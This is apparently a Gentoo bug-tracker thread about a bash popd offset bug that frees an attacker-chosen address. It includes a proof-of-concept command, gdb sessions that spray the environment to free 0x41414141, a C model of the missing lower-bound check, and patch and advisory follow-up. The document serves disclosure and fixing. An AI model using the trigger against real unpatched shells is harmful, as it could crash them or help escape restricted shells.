popd can be tricked to free a user-supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) on some environments to cause use-after-free. This was already reported to bash devs and only considered a bug; if Mitre considers it could have a security impact, please assign a CVE.

Details
=======

$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384	  free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----

$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:	"AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863
863	  if (p->mh_alloc == ISMEMALIGN)
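The defect the report describes is an offset check that bounds the value from above but not from below, so an argument like "+-111111" parses as a negative offset and becomes an index far outside the directory list before free() is reached. The C model below is an added illustration for this thread, not bash's pushd.def (whose exact checks are not reproduced here); the dirstack_t type, the function names and the sample directories are constructed for the example. It puts a weak upper-bound-only check next to the hardened two-sided check and shows what index each one yields for the report's input.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified model of a pushd/popd directory stack. Constructed for this
 * illustration; it is NOT bash's pushd.def. */
#define STACK_MAX 8

typedef struct {
    char *dirs[STACK_MAX];  /* heap-allocated entries; dirs[0] is the top */
    int count;              /* number of valid entries */
} dirstack_t;

static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p)
        memcpy(p, s, n);
    return p;
}

/* Parse a popd-style argument such as "+3" or "-2". Returns -1 if the
 * argument is malformed; otherwise stores the sign character in *direction
 * and the number after it in *offset. "+-111111" parses successfully with a
 * NEGATIVE offset, which is the input class the report is about. */
static int parse_offset(const char *arg, char *direction, long *offset)
{
    if (arg == NULL || (arg[0] != '+' && arg[0] != '-'))
        return -1;
    char *end;
    *direction = arg[0];
    *offset = strtol(arg + 1, &end, 10);
    if (end == arg + 1 || *end != '\0')
        return -1;
    return 0;
}

/* Weak check: rejects offsets at or beyond the stack size but never looks
 * at the lower bound, so a negative offset slips through. */
static bool offset_in_range_weak(long offset, int count)
{
    return offset < count;   /* missing: offset >= 0 */
}

/* Hardened check: both bounds, so the index is always inside dirs[0..count-1]. */
static bool offset_in_range(long offset, int count)
{
    return offset >= 0 && offset < count;
}

/* Translate a popd argument into an index into dirs[], or -1 if rejected.
 * "+N" counts from the top, "-N" from the bottom. With hardened == false the
 * weak check is used, which is how a negative offset turns into an
 * out-of-bounds index (in the real bug, into a free() of whatever
 * pointer-sized value lives at that address). */
long popd_index(const dirstack_t *st, const char *arg, bool hardened)
{
    char direction;
    long offset;
    if (parse_offset(arg, &direction, &offset) != 0)
        return -1;
    bool ok = hardened ? offset_in_range(offset, st->count)
                       : offset_in_range_weak(offset, st->count);
    if (!ok)
        return -1;
    return direction == '+' ? offset : (long)st->count - 1 - offset;
}

/* Remove and free one entry using the hardened check only. */
int popd_remove(dirstack_t *st, const char *arg)
{
    long i = popd_index(st, arg, true);
    if (i < 0)
        return -1;
    free(st->dirs[i]);
    for (long j = i; j + 1 < st->count; j++)
        st->dirs[j] = st->dirs[j + 1];
    st->dirs[--st->count] = NULL;
    return 0;
}

/* Constructed three-entry stack so the block runs stand-alone. */
void sample_stack(dirstack_t *st)
{
    const char *sample[] = { "/srv/www", "/var/log", "/tmp" };
    st->count = 0;
    for (int k = 0; k < 3; k++)
        st->dirs[st->count++] = dup_str(sample[k]);
}

int main(void)
{
    dirstack_t st;
    sample_stack(&st);
    printf("weak     '+-111111' -> index %ld\n", popd_index(&st, "+-111111", false));
    printf("hardened '+-111111' -> index %ld\n", popd_index(&st, "+-111111", true));
    printf("popd +1 -> %d, %d entries left\n", popd_remove(&st, "+1"), st.count);
    while (st.count > 0)
        free(st.dirs[--st.count]);
    return 0;
}
```

The weak path is only ever used to compute and print an index, never to touch memory; the point is that a signed offset needs a lower-bound check before it is used as an array index, and that rejecting the argument (as popd_remove does) is the correct outcome for "+-111111".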
@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
added upstream's fix to 4.4: https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=1bf1ceeb04a2f57e1e5e1636a8c288c4d0db6682

Chet seemed confident it isn't exploitable (beyond making the active shell crash/exit immediately)
@ Arches, please test and mark stable: =app-shells/bash-4.4_p5-r1
Stabilization postponed on request of base-system (looks like they want to stabilize 4.4.x together with readline-7.x and aren't ready yet).
I've added the fix to bash-4.3 so we (base-system) have a bit more time figuring out if readline-7.0 is ready for stabilization:

commit c3d3bdc215881e2712843708c42978b7bac96ba9
Author: Lars Wendler <polynomial-c@gentoo.org>
Date:   Sun Dec 4 17:06:54 2016

    app-shells/bash: Revbump to add popd offset overflow fix to bash-4.3 (#600174).

    Package-Manager: portage-2.3.2

Arches please test and mark stable =app-shells/bash-4.3_p48-r1 with target KEYWORDS: alpha amd64 arm ~arm64 hppa ia64 ~m68k ~mips ppc ppc64 ~s390 ~sh sparc x86 ~amd64-fbsd ~sparc-fbsd ~x86-fbsd
Stable on alpha.
yes, we do not want to stabilize bash-4.4 this year. it needs more time to sit.
amd64 stable
x86 stable
done the rest now
(In reply to SpanKY from comment #10)
> done the rest now

Thanks, Mike! GLSA pending review.
This issue was resolved and addressed in GLSA 201701-02 at https://security.gentoo.org/glsa/201701-02 by GLSA coordinator Thomas Deutschmann (whissi).
Re-opening for cleanup. @ Maintainer(s): Please drop <app-shells/bash-4.3_p48-r1 or apply masks indicating a security problem.
Cleanup PR: https://github.com/gentoo/gentoo/pull/3392
Ping: PR was closed because earlier bash versions are kept for testing reasons.

Security Team Padawan ChrisADR
@base-system, can we mask here?
Cleanup done, closing as RESOLVED. Thank you all.